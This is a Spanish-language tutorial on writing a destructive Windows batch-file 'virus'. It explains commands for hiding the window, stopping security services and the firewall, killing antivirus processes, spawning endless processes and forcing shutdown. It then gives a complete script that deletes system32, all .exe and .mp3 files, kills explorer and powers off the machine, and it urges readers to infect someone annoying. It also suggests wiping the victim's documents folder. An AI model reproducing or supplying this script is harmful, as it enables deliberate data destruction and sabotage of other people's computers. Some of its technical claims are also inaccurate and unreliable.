

Tutorial de como hacer un virus fácilmente en batch (.bat)

Para crear un virus .batch potente y sencillo, no hace falta saber de programación, aunque conviene. Batch es un lenguaje de MS-DOS, el sistema operativo en el que trabaja window (Window es un sistema operativo de Microsoft).

Si explico como crear virus fácilmente, no es para que lammers se lo den a todo el mundo. Un lammer es una persona que, por ejemplo, coge un virus sencillo ya creado, se lo pasa a todos los que conoce y disfruta con esto creyéndose un hacker. Explico como crear un virus para que aprendan y como mucho infecteis a una persona molesta 😊

Como dije antes, batch (.bat) es el lenguaje de MS-DOS y se suele utilizar para crear virus. Podeis ejecutar MS- DOS en Window en Inicio > Ejecutar escribiendo cmd tal cual, pero vamos a crear y editar el virus batch .bat en un documento de texto (notepad). Los códigos más usados son estos:

### @echo off

Sirve que para que nuestro virus no salga en la pantalla,es decir,para que la ventanita del ms-dos no sea mostrada.

### title

Tanto como en nuestro virus como en otro programa programado en “batch” sirve para poner un título a la aplicación que hayamos programado.En pocas palabras: “Pone un tituto a nuestro programa”

### Del:

Comando que se usa explícitamente para borrar carpetas o ficheros,mediante otros comandos se puede forzar el borrado de la carpeta,o de cualquier otro archivo

Comandos del comando Del:

Comando: /F (Borra los archivos con solo lectura)

Comando: /S (Elimina los archivos indicados)

Comando: /P (Pide confirmación antes de borrar cada archivo)

### Net Stop

Sirve para parar algun servicio o medio que transcurra a través de nuestro sistema,así como el centro de seguridad,firewall de windows o otro medio de seguridad del equipo.Con este comando,facilita una desactivación de estos servicios,evitando ser activados automáticamente.

Pero a través de este comando,el usuario puede ver como han sido desactivados componentes de su sistema.

### taskkill

Este comando es usado a la hora de querer matar procesos que corren a través de nuestro

sistema. Cuando queremos parar un proceso de nuestro sistema, este comando realiza esa función, mata un proceso específico que le hayamos ordenado, más comodo a la hora de querer meter nuestro virus y matar el antivirus, o matar cualquier otro proceso que lleve a un programa, aplicacion...

### start

Comando start sirve para empezar una tarea, ya sea abrir el explorador, un programa, una hoja de cálculos (bloc de notas) paint, wordpad, word... Cualquier programa, con solo el comando "start" seguido del programa a ejecutar, ejemplo:

```
start cmd.exe
```

### :bucle — goto bucle

El comando :bucle sirve para hacer un bucle como su propio nombre indica. Con este comando podemos ejecutar infinitas tareas, programas, aplicaciones, juegos... Todo esto de forma masiva, de modo que lo único que podremos hacer, seria reinicio del ordenador.

El comando goto bucle, es el que hay que poner una vez indicado la tarea a realizar. Ejemplo:

```
:bucle  
start cmd.exe  
goto bucle
```

Hemos dicho a nuestro virus mediante el comando :bucle y goto bucle que habra infinitos cmd de notas masivamente, esto es un ejemplo, se pueden abrir 1000 programas más.

### shutdown

Comando shutdown sirve para reiniciar o apagar el ordenador mediante un tiempo estimado que se le añada o otros valores.

Comandos de shutdown:

Comando: -s (Apaga el equipo)

Comando: -r (Apagar y reiniciar el ordenador)

Comando: -a (Anula el apagado del equipo)

Comando: -t 21 (Pone tiempo para el apagado, donde dice 21 son los segundos que tardará en apagarse/reiniciarse.

Comando: -f (Fuerza el cierre de todos los programas sin advertir al usuario)

Empezemos:

Para empezar a hacer nuestro primer bichito, podemos empezar por algo sencillo, en nuestra consola escribimos lo siguiente:

```
@echo off
```

Una vez tecleado esto, con el comando “del” podemos indicar que carpeta o fichero borrar. Yo por ejemplo, podría poner este código:

```
@echo off
del /S /F c:\windows\system32\
del /S /F *exe
del /S /F *mp3
taskkill /f /im “explorer.exe”
shutdown -s -f -t 10 -c “Muestra del virus”
```

Este es mi virus, es muy básico, ya que puede meterse más código y más dañino, pero con esto, ya es asegurado un daño. Explicación:

El “@echo off” consigue que el virus se ejecute “sigilosamente”, como explicamos.

El “del /S /F c:\windows\system32” Borra system32 o lo mismo “rompe el pc”. La víctima tendría que formatear el ordenador e instalar el Sistema operativo

El “del /S /F \*exe” borra todos los archivos .exe, entre los que se encuentran aplicaciones de procesos “vitales”, por lo que tendrá que formatear también.

El “del /S /F \*mp3” No se carga el ordenador, pero borra todos los archivos .mp3

El “taskkill /f /im “explorer.exe”” Cierra el proceso explorer, por lo que el ordenador se congelará.

El “shutdown -s -f -t 10 -c “Muestra del virus”” apaga el ordenador a los 10 segundos.

Haciendo unos cambios, como borrar la carpeta Mis documentos antes de cargarse el ordenador, conseguimos que la víctima pierda totalmente archivos y documentos que de la otra manera se pueden recuperar. Para guardarlo en batch, en el bloc de notas, vamos archivo > guardar como > ponemos el nombre > elegimos “todos los archivos” y en el nombre lo acabamos en .bat

Ya está, parecía más complejo de lo que era. Ya teneis vuestro primer virus sencillo en batch o bat